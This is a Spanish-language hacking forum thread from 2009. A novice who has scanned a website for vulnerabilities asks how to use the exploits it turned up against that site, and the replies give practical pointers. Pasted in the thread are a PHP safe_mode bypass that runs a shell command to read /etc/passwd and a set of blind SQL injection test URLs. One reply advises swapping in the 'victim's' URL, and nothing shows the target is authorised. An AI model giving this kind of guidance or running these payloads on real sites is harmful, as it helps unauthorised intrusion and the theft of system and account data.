¿como devieria continuar?

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio

Ayuda

Ingresar

Registrarse

12 Febrero 2012, 21:42

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

¿como devieria continuar?

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Ir Abajo

Respuesta

Imprimir

Autor

Tema: ¿como devieria continuar? (Leído 1,855 veces)

storm_shadow24

Desconectado

Desconectado

Mensajes: 4

Ver Perfil

¿como devieria continuar?

« en: 12 Diciembre 2009, 12:50 »

Hola a todos... bueno recien empiezo con esto del hack, anteriormente estaba en eso del cracking pero ahora me intersa mucho sobre exploits, lei bastante y bueno he estado usando el SSS (shadow security scaner) para ver los bugs de una pagina y me dieron como 17 para ser exactos... bueno amigos queria pedirles que me guien... aqui voy...

una de las vulnerabilidades es esta:

1.- http://www.securityfocus.com/bid/29936/info (no pongo el exploit por que es largo, pero se muestra en la pestaña exploit de la pagina)

2.-http://www.securityfocus.com/bid/32902 el exploit que me das es este:

Citar

<?php
/*
php_python_bypass.php
php python extension safe_mode bypass
Amir Salmani - amir[at]salmani[dot]ir
*/

//python ext. installed?
if (!extension_loaded('python')) die("python extension is not installed\n");

//eval python code
$res = python_eval('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');

//show result
echo $res;
?>

3.- luego tambien este es otro exploit que no logro entender:

Citar

http://www.example.com/demo/index.php?id=511 y substring (@ @ versión, 1,1) = 5
http://www.example.com/demo/index.php?id=511 and 1=1 http://www.example.com/demo/index.php?id=511 y 1 = 1
http://www.example.com/demo/index.php?id=511 and substring(@@version,1,1)=4 http://www.example.com/demo/index.php?id=511 y substring (@ @ versión, 1,1) = 4
http://www.example.com/demo/index.php?id=511 and 1=2 http://www.example.com/demo/index.php?id=511 y 1 = 2

Por favaor quisiera que alguien me ayude como usarlo... estuve leyendo para la compilacion en c++ y esta probando pero no se como guardar ni como usarlo como ejecutable... alguna ayuda porfavor...
MUCHAS GRACIAS DE ANTEMANO....


	En línea

wisehacks

Desconectado

Desconectado

Mensajes: 21

Ver Perfil

Re: ¿como devieria continuar?

« Respuesta #1 en: 12 Diciembre 2009, 13:51 »

No puedes compilarlo en C++ porque esos exploits que has puesto no son código C++. El primero es PHP y lo segundo es un SQL injection.

En el primero tienes que tener acceso al servidor, y sirve para evadir el safe_mode de PHP. Te sería útil por ejemplo en entornos de shared hosting donde tienes una web y puedes subir tu código o en servidores con RFI o que hayas comprometido de antemano.

Para el segundo, te recomiendo que te leas algo sobre SQL injection, hay muy buenos tutoriales en este foro, y en google. Básicamente deberías cambiar la URL que te da el exploit por la de tu víctima, manteniendo la parte de la inyección SQL.

Espero haberte ayudado, pero creo que te has saltado muchos pasos previos a explotar vulnerabilidades.


	En línea

storm_shadow24

Desconectado

Desconectado

Mensajes: 4

Ver Perfil

Re: ¿como devieria continuar?

« Respuesta #2 en: 13 Diciembre 2009, 03:15 »

Cita de: wisehacks en 12 Diciembre 2009, 13:51

No puedes compilarlo en C++ porque esos exploits que has puesto no son código C++. El primero es PHP y lo segundo es un SQL injection.

En el primero tienes que tener acceso al servidor, y sirve para evadir el safe_mode de PHP. Te sería útil por ejemplo en entornos de shared hosting donde tienes una web y puedes subir tu código o en servidores con RFI o que hayas comprometido de antemano.

Para el segundo, te recomiendo que te leas algo sobre SQL injection, hay muy buenos tutoriales en este foro, y en google. Básicamente deberías cambiar la URL que te da el exploit por la de tu víctima, manteniendo la parte de la inyección SQL.

Espero haberte ayudado, pero creo que te has saltado muchos pasos previos a explotar vulnerabilidades.

En la primera parte en el exploit de php... ya lo compile... pero como lo ajecuto contra la web que he escaneado...?


	En línea

AlbertoBSD

Estudiante y
Colaborador

Desconectado

Desconectado

Mensajes: 1.955

Anonymous & Paranoid

Ver Perfil

WWW

Re: ¿como devieria continuar?

« Respuesta #3 en: 18 Diciembre 2009, 06:05 »

La mayoria de las veces el SSS, te arroja errores genéricos que pueden estar en mil sistemas distintos.

Seria de tratar de comprobar manualmente si la pagina es vulnerable o no.

Para eso un scaner de vulnerabilidades no te va a ayudar mucho, pueden salirte 17 o 512 errores, y en realidad solo necesitas conocer como explotar uno para llevarte toda la web.


	En línea

Bien Super Divertido
@wifigdlmx

Páginas: [1]

Ir Arriba

Respuesta

Imprimir

Ir a:

Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

elotrolado	lawebdegoku	MundoDivx	Hispabyte	Truzone
ZonaPhotoshop	Yashira.org	Videojuegos	indetectables.net	Seguridad Colombia
Indejuegos	Seguridad Informática	Juegos de Mario	Internet móvil	Noticias Informatica
ADSL	eNYe Sec	Seguridad Wireless	Underground México	Biblioteca de Seguridad
InSecurity.Ro - ISR	Soluciones Web	ejemplos de	El Lado del Mal	Blog Administrador Sistemas
Blog Uxio	thehackerway

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines